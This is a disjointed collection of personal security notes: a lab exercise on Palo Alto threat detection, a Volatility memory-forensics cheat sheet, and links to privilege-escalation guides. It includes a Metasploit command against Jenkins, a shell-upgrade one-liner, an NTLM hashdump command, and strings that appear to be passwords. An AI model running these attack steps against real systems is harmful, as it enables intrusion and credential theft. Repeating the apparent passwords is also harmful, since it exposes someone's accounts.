If the openssl pkcs12 -info command outputs multiple ---- BEGIN CERTIFICATE blocks, then the PKCS#12 contains the full chain, and this should all work fine. If it has only a single certificate block, then the customer will need to get their CA cert from elsewhere.

noSuchThingAsCheats

main:
  name: 'moshi-moshi'
  whitelist:
    - 'SSIDNameHere'
  plugins:
    grid:
      enabled: true
      report: true
      exclude:
        - 'SSIDNameHere'

ui:
    display:
      enabled: true
      type: 'waveshare_2'
      color: 'black'

goog palo ids

//ephemeral ips fysa :)
GSP748 - Palo Alto Networks: Advanced Threat Detection

Compute Engine > Juice-shop > ext IP
//Juice-shop

// PAN VM-Series
addr.src in {*your IP address*}
82.23.254.71
addr.src in {82.23.254.71}
34.72.30.36/#/score-board

//JENKINS
ip:8080
//KALI
msfconsole -r jenkins.rc
python -c 'import pty; pty.spawn("/bin/bash")'

addr.src in {82.23.254.71}
( severity neq informational )
( addr.dst in 192.168.11.3 ) or ( addr.dst in 192.168.11.4 )
(( addr.dst in 192.168.11.3 ) or ( addr.dst in 192.168.11.4 ) ) and ( severity neq informational )
( addr.src in 192.168.11.3 )

welcome2twenty20

Memory Analysis Tools
Volatility (Windows/Linux/Mac)
https://code.google.com/p/volatility/
Mandiant Redline (Windows)
http://www.mandiant.com/resources/download/redline
VolaFox (Mac OS / BSD)
https://github.com/n0fate/volafox

Volatility Basics
The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples

Location in Kali Linux
/usr/share/volatility/vol.py
Examples
Show Options and Supported plugins
$ vol.py -h
Show plugin usage
$ vol.py -h
Identify System Profile
$ vol.py -f mem.img imageinfo

Identify Rogue Process
High level view of running processes
$ vol.py pslist -f mem.img
Scan memory for EPROCESS Blocks
$ vol.py psscan -f mem.img
Display parent-process relationships
$ vol.py pstree -f mem.img

Look for Evidence of Code Injection
malfind
-p show information only for specific PIDs
-o Provide physical offset if single process to scan
--dump-dir Directory to save memory section
$ vol.py malfind --dump-dir ./output_dir
ldrmodules
$ vol.py ldrmodules -p 868 -v

Check for Signs of a Rootkit
Examples
Find Hidden processes using cross-view
$ vol.py psxview
Scan Memory for loaded, unloaded and Unlinked drivers
$ vol.py modscan
Find API/DLL Function hooks
$ vol.py apihooks
$ vol.py apihooks -p 868 (Specific PID)
$ vol.py apihooks -Q (Only Critical Processes)
Hooks in System Service Descriptor Table
$ vol.py ssdt | grep -v '(ntoskrnl|win32k)'
Display Interrupt Descriptor Table
$ vol.py idt
Identify I/O Request Packet (IRP) hooks
$ vol.py driverip -r tcpip

Analyze Process DLLs and Handles
Examples
List of loaded dlls by process
$ vol.py dlllist -p 4,868
Print process security indentifiers
$ vol.py getsids -p 868
List of open handles for each process
-t Display handles of a certain type
{Process, Thread, Key, Event, File, Mutant, Token, Port}
$ vol.py handles -p 58 -t Process, Mutant
Scan memory for FILE_OBJECT handles
$ vol.py filescan
Scan for Windows Service Information
$ vol.py svcscan

Dump Suspicious Processes and Drivers
Examples
Extract DLLs from Specific Processes
dlldump
-p Dump DLLs only for specific PIDs
-b Dump DLLs from process at physical memory offset
-r Dump DLLs matching REGEX name
--dump-dir Directory to save extracted files
$ vol.py dlldump --dump-dir ./output –r metsrv

Extract kernel drivers
moddump
-o Dump driver using offset address (from modscan)
-r Dump drivers matching REGEX name
--dump-dir Directory to save extracted files
$ vol.py moddump --dump-dir ./output –r gaopdx

Dump process to executable sample
procmemdump
-p Dump only specific PIDs
-o Specify process by physical memory offset
--dump-dir Directory to save extracted files
$ vol.py procmemdump --dump-dir ./output –p 868

Dump every memory section into a file
-p Dump memory sections from these PIDs
--dump-dir Directory to save extracted files
$ vol.py memdump –dump-dir ./output –p 868

Review Network Artifacts
Examples
[XP] List of open TCP connections
$ vol.py connections
[XP] ID TCP connections, including closed
$ vol.py connscan
[XP] Print listening sockets (any protocol)
$ vol.py sockets
[XP] ID sockets, including closed/unlinked
$ vol.py sockscan
[Win7] Scan for connections and sockets
$ vol.py netscan

Memory Acquisition
Windows Operating Systems
Win32dd (x86) / Win64dd (x64)
Example
c:> win32dd.exe /f E:\memory.img
MemoryDD.bat
Example
c:> MemoryDD.bat --output E:
Volatily WinPmem
Options

  • output to standard out
    -l Load driver for live memory analysis

Converting Hibernation Files and Crash Dumps
Volatility imagecopy
Options
-f Name of Source File
-O Output file Name
--profile Source OS from imageinfo

Examples
$ vol.py imagecopy -f hiberfil.sys -O hiber.img --profile=Win7SP1x64
$ vol.py imagecopy -f Memory.dmp -O memdmp.img --profile=Win7SP1x64

Memory Artifact Timelining
The Volatility Timeliner plugin parses time-stamped objects found in memory images. Output is sorted by:
Process creation time
Thread creation time
Driver compile time
DLL / EXE compile time
Network socket creation time
Memory resident registry key last write time
Memory resident event log entry creation time
timeliner
‐‐output‐file Optional file to write output (v2.1)
‐‐output=body bodyfile format for mactime (v2.3)
$ vol.py -f mem.img timeliner --output-file out.csv --profile=Win7SP1x86

Registry Analysis Volatility Plugins
hivelist - Find and list available registry hives
$ vol.py hivelist
hivedump - Print all keys and subkeys in a hive
-o Offset of registry hive to dump (virtual offset)
$ vol.py hivedump –o 0xe1a14b60
printkey - Output a registry key, subkeys, and values
-K “Registry key path”
$ vol.py printkey –K “Software\Microsoft\Windows\CurrentVersion\Run”
userassist - Find and parse userassist key values
$ vol.py userassist
hashdump - Dump user NTLM and Lanman hashes
-y Virtual offset of SYSTEM registry hive (from hivelist)
-s Virtual offset of SAM registry hive (from hivelist)
$ vol.py hashdump –y 0x8781c008 –s 0x87f6b9c8

AUTOPSY MAC INSTALL:
https://github.com/sleuthkit/autopsy
https://github.com/sleuthkit/autopsy/blob/develop/Running_Linux_OSX.txt

Linux-Privilege-Escalation:
https://github.com/frizb/Linux-Privilege-Escalation

Upgrading Simple Shells to Fully Interactive TTYs:
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Post-Exploitation Without A TTY:
http://pentestmonkey.net/blog/post-exploitation-without-a-tty

Linpeas:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.